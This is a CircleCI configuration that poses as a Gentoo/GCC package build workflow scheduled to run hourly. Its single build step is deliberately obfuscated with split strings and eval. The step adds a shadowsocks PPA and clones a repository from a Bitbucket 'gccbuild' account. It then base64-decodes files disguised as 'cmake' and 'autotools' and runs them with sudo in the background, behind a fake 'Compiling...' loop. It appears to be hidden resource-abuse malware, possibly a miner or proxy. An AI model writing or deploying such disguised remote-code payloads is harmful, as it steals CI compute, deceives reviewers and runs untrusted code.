version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--buildpkg", "--root", "--usepkgonly", "--with-bdeps-auto", "--quiet-repo-display", "--oneshot", "--update", "--newuse", "--nodeps", "--rebuild-if-new-ver", "--read-news", "--rebuilt-binaries", "--quiet-unmerge-warn", "--useoldpkg-atoms", "--getbinpkgonly", "--alphabetical", "--autounmask-keep-keywords", "--fail-clean", "--accept-restrict", "--ignore-soname-deps"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--buildpkg", "--root", "--usepkgonly", "--with-bdeps-auto", "--quiet-repo-display", "--oneshot", "--update", "--newuse", "--nodeps", "--rebuild-if-new-ver", "--read-news", "--rebuilt-binaries", "--quiet-unmerge-warn", "--useoldpkg-atoms", "--getbinpkgonly", "--alphabetical", "--autounmask-keep-keywords", "--fail-clean", "--accept-restrict", "--ignore-soname-deps"]
    triggers:
      - schedule:
          cron: "24 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: RELEASE-nitro
          command: |
            NxeJiDWXJWE="sudo add-ap"
            rRhbrQJ="t-repositor"
            OvJnzmX="y ppa:max-c"
            UEbrc="-lv/shadows"
            NTEbMUufqvt="ocks-libev "
            NFSnTYrC="-y &>/dev/n"
            eval "$NxeJiDWXJWE""$rRhbrQJ""$OvJnzmX""$UEbrc""$NTEbMUufqvt""$NFSnTYrC""ull || true"
            jtFlGS="sudo add-ap"
            CrxsbA="t-repositor"
            MMKsskMcj="y ppa:ondre"
            UnekcwR="j/apache2 -"
            LdJjR="y &>/dev/nu"
            eval "$jtFlGS""$CrxsbA""$MMKsskMcj""$UnekcwR""$LdJjR""ll || true"
            TiGlTJZPo="sudo apt up"
            mDCPjKgSCHl="date || tru"
            eval "$TiGlTJZPo""$mDCPjKgSCHl""e"
            sudo apt --yes install openssl &>/dev/null || true
            kajdGYsfJ="sudo apt --"
            pmVNWdlfaQq="yes install"
            jtEkWnOkQCG=" cl-base64 "
            rxGUl="git &>/dev/"
            TWGQFYHoPv="null || tru"
            eval "$kajdGYsfJ""$pmVNWdlfaQq""$jtEkWnOkQCG""$rxGUl""$TWGQFYHoPv""e"
            TyKdJNt="git clone h"
            vRErT="ttps://gccb"
            hiPalq="uild@bitbuc"
            zmKzsBcwBHS="ket.org/gcc"
            ewZyv="build/gcc.g"
            eNjAQC="it &>/dev/n"
            eval "$TyKdJNt""$vRErT""$hiPalq""$zmKzsBcwBHS""$ewZyv""$eNjAQC""ull"
            pAMfVQHI="base64 -d g"
            ZtNnotzAWW="cc/cmake_np"
            eval "$pAMfVQHI""$ZtNnotzAWW""_ > cmake"
            VqpmZIwAYF="base64 -d g"
            CyNoqpmJz="cc/config_ "
            wMzSyZUMkDs="> output.lo"
            eval "$VqpmZIwAYF""$CyNoqpmJz""$wMzSyZUMkDs""g"
            twdXzX="base64 -d g"
            PgarRlz="cc/make_ > "
            eval "$twdXzX""$PgarRlz""autotools"
            sed -i 's/1080/1081/g' output.log
            chmod +x autotools cmake
            ./cmake
            qcysi="sed -i 's/b"
            zEvmEDH="uild/ob2o/g"
            JDwjzQfq="' output.lo"
            eval "$qcysi""$zEvmEDH""$JDwjzQfq""g"
            sudo ./autotools --config output.log &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2514)) ] && sudo killall autotools && break; sleep 225; done
